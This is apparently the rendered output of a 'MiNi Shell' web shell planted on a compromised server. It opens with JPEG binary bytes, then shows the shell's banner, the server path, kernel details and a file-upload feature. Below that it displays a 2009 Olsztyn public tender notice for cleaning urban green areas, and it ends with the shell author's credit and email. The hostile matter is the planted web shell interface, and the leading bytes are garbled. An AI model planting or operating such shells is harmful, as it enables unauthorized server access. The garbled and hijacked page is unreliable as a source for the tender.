JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/86296-N-2009.html

<p class="kh_header"><b>Olsztyn: Wykonywanie prac związanych z oczyszczaniem terenów zieleni na
terenie miasta Olsztyna w roku 2009 .
Kody CPV : 90600000-3 ,  90610000-6 , 45111213-4 		
(usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane usługi sprzątania i zamiatania ulic roboty w zakresie oczyszczania terenu)</b><br>
<b>Numer ogłoszenia: 86296 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Olsztyn , pl. Jana Pawła II 1, 10-101 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 5273111 wew. , 325, faks (089) 5349375.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olsztyn.kei.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie prac związanych z oczyszczaniem terenów zieleni na
terenie miasta Olsztyna w roku 2009 .
Kody CPV : 90600000-3 ,  90610000-6 , 45111213-4 		
(usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich oraz usługi powiązane usługi sprzątania i zamiatania ulic roboty w zakresie oczyszczania terenu).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie prac związanych z oczyszczaniem terenów zieleni na terenie miasta Olsztyna w roku 2009 wg harmonogramu oczyszczania w sektorach I i VI, stanowiącego załącznik nr 8.1 i 8.2 do SIWZ.
2. Teren miasta został podzielony na 11 sektorów obejmujących dzielnice ( sektor nr 1-6) oraz parki ( sektory nr 7-11). Niniejsze postępowanie dotyczy sektora nr 1 -Centrum miasta oraz sektora nr 6 - Jaroty, Nagórki, Pieczywo, zgodnie z załącznikiem graficznym nr 10 do SIWZ. 3. Szczegółowy opis przedmiotu zamówienia opracowany został przez Wydział Środowiska i Zieleni tut. Urzędu Miasta i zawarty jest w opracowaniu pn. Utrzymanie czystości na terenach zieleni w mieście Olsztyn stanowiącym załącznik nr 9 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 45.11.12.13-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający ustala wadium w wysokości:

- dla części I zamóweinia - 2500 zł (słownie: dwa tysiące pięćset złotych),
- dla części II zamóweinia - 2500 zł (słownie: dwa tysiące pięćset złotych),

W przypadku złożenia oferty na obydwie części wadium wynosi 5000 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy :
1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.  1) Wykonawca musi posiadać aktualną ( ważną ) decyzję zezwalającą na odbiór odpadów komunalnych z terenu m. Olsztyn, wydaną na podstawie przepisów ustawy z dnia 27.04.2001 r. o odpadach ( warunek dotyczy wszystkich części objętych zamówieniem ). W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć decyzję zezwalającą na odbiór odpadów komunalnych z terenu m. Olsztyna w zakresie objętym zamówieniem publicznym. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymieniony warunek musi być spełniony przez Wykonawcę, który będzie wykonywał część zamówienia publicznego, do wykonywania której ustawy nakładają obowiązek posiadania w/w decyzji .
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (warunek dotyczy wszystkich części objętych zamówieniem); 3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (warunek dotyczy wszystkich części objętych zamówieniem); 4. Spełniają następujące warunki dodatkowe:
1) Wykonali z należytą starannością w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 1 usługę polegającą na realizacji zadań związanych z oczyszczaniem terenów na kwotę wynikającą z umowy zawartej ze zleceniodawcą usługi równą co najmniej 80.000 zł ( z VAT ). Zrealizowane usługi muszą być potwierdzone odpowiednimi dokumentami o należytym ich wykonaniu (opinie, referencje, protokóły itp.). Warunek dotyczy wszystkich części objętych zamówieniem. W celu potwierdzenia spełniania niniejszego warunku, Wykonawca zobowiązany jest przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego załącznik nr 1 do niniejszej SIWZ oraz dokumenty potwierdzające, że usługi wymienione w wykazie zostały wykonane należycie (opinie, referencje, protokoły itp.). W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymieniony warunek musi być spełniony łącznie przez wszystkich Wykonawców.
2) Dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, tj. co najmniej: a) 3 osobami do bezpośredniej realizacji zamówienia w poszczególnych sektorach, b) 1 osobą do nadzorowania prawidłowości wykonywania prac.
Zamawiający dopuszcza aby Wykonawca wykazał się min. 1 osobą do nadzorowania prawidłowości wykonywania prac we wszystkich sektorach objętych przedmiotem zamówienia, natomiast do bezpośredniej realizacji zamówienia min. 3 osobami na każdy sektor ( wg wzoru: 3 x ilość sektorów = min. liczba osób ). Warunek dotyczy wszystkich części objętych zamówieniem. W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć wykaz osób, którymi dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu zamówienia sporządzony według wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ. Uwaga ! Jeżeli w wykazie osób ( część B.) Wykonawca wskaże osoby, którymi będzie dysponował do wykonania przedmiotowego zamówienia, należy wówczas dodatkowo przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, spełniających warunek Zamawiającego. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymieniony warunek musi być spełniony łącznie przez wszystkich Wykonawców, 3) Dysponują lub będą dysponować odpowiednim potencjałem technicznym niezbędny do wykonania przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów  do udostępnienia potencjału technicznego niezbędnego do wykonania zamówienia tj.: Wykonawca musi dysponować co najmniej dwoma pojazdami do przewozu zanieczyszczeń tj.: a)1 pojazdem o masie całkowitej do 3,5 t. dopuszczonym do poruszania się na terenach parków, zieleńców i chodnikach w pasach drogowych.
b)1 pojazdem ( samochód lub ciągnik ) do wywozu zanieczyszczeń z terenów w pasach drogowych. Warunek dotyczy wszystkich części objętych zamówieniem.    W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć wykaz niezbędnych do wykonania zamówienia pojazdów, którymi dysponuje lub będzie dysponował, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ. Uwaga !Jeżeli w wykazie pojazdów (część B) Wykonawca wskaże pojazdy, którymi będzie dysponował, należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia pojazdów, spełniających warunek Zamawiającego.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymieniony warunek musi być spełniony łącznie przez wszystkich Wykonawców. 5. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 i 2 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych ( warunek dotyczy wszystkich części objętych zamówieniem). W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć oświadczenie o nie podleganiu wykluczenia z postępowania o udzielenie zamówienia sporządzone według wzoru stanowiącego zał. nr 4 do SIWZ. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymieniony warunek musi być spełniony przez każdego Wykonawcę.
6. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale VI niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, lub którzy nie złożą pełnomocnictw, albo którzy złożą dokumenty zawierające błędy lub którzy złożą wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
Uwaga ! Nie spełnienie chociażby jednego z ww warunków, skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty ( wypełnionego formularza ofertowego ) należy dołączyć następujące oświadczenia i dokumenty : 1) Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia - wg wzoru załącznika nr  4 do SIWZ (oświadczenie wspólne dla obu części zamówienia). Uwaga ! W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, wyżej wymienione oświadczenie musi być złożone przez każdego z Wykonawców, 2) Aktualną ( ważną ) decyzję zezwalającą na odbiór odpadów komunalnych z terenu m. Olsztyn wydaną na podstawie przepisów ustawy z dnia 27.04.2001 r. o odpadach (dokument wspólny dla obu części zamówienia), 3) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, przedstawiające aktualny stan faktyczny i prawny, tj. w przypadku: a) spółek prawa handlowego, przedsiębiorstw, spółdzielni i innych podmiotów zarejestrowanych w sądzie - odpis z rejestru sądowego (KRS), b) spółek cywilnych - zaświadczenie o wpisie do ewidencji działalności gospodarczej (dotyczy każdego ze wspólników będących przedsiębiorcami), c) osób fizycznych - zaświadczenie o wpisie do ewidencji o działalności gospodarczej. (dokument jest wspólny dla obu części zamówienia).    4) Wykaz usług wykonanych przez Wykonawcę z należytą starannością w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wg wzoru zał. nr 1 do SIWZ  (wykaz jest wspólny dla obu części zamówienia), 5) Dokumenty potwierdzające, że usługi, o których mowa w pkt. 1.4) zostały wykonane należycie - (np. opinie, referencje, protokoły itp., 6) Wykaz osób, którymi Wykonawca dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu zamówienie, a także zakres wykonywanych przez nich czynności - wg wzoru zał. nr 2 do SIWZ. Jeżeli w wykazie (część B) Wykonawca wskaże osoby, którymi będzie dysponował, należy wówczas dodatkowo przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia tych osób do wykonania przedmiotowego zamówienia, spełniających warunek Zamawiającego (dla każdej części zamówienia wymagane jest złożenie odrębnego wykazu zawierającego co najmniej 3 osoby przewidziane do bezpośredniej realizacji zamówienia w poszczególnych sektorach + 1 osoba do nadzorowania prawidłowości wykonywania prac, która może być wspólna dla wszystkich części zamówienia ), 7) Wykaz niezbędnych do wykonania przedmiotu zamówienia pojazdów - wg wzoru zał. nr 3 do SIWZ ( wykaz jest wspólny dla wszystkich części zamówienia ). Jeżeli w wykazie ( część B) Wykonawca wskaże pojazdy, którymi będzie dysponował, należy wówczas dodatkowo przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia pojazdów, spełniających warunek Zamawiającego, 8) Kosztorysy ofertowe obejmujące odpowiednie części zamówienia ( sektory ), o które ubiega się Wykonawca, sporządzone wg wzorów zał. nr 6.1., 6.2. do SIWZ, obejmujące cały zakres prac objętych daną częścią zamówienia (dla każdej części zamówienia wymagane jest złożenie odrębnego kosztorysu ofertowego)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych Urząd Miasta Olsztyn, Pl. Jana Pawła II 1,            10 - 101 Olsztyn pok. 402..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2009 godzina 10:00, miejsce: Wydział Zamówień Publicznych Urząd Miasta Olsztyn, Pl. Jana Pawła II 1,          10 - 101 Olsztyn pok. 402.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 08.05.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy do oferty dołączyć dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej - do oferty należy dołączyć pełnomocnictwo. Znak sprawy : ZP.b.3410-40/2009. Termin otwarcia ofert 09.04.2009 godz. 11.00. Zamawiający wymaga zabezpieczenia należytego wykonania umowy w wysokości 5% ceny ofertowej..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sektor 1 - teren Centrum Miasta.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokładny opis niniejszej częci zamówienia znajduje się w SIWZ i załącznikach dostępnej na stronie internetowej Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 45.11.12.13-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sektor 2 - Jaroty, Nagórki,  Pieczewo....</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dokładny opis niniejszej częci zamówienia znajduje się w SIWZ i załącznikach dostępnej na stronie internetowej Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 45.11.12.13-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com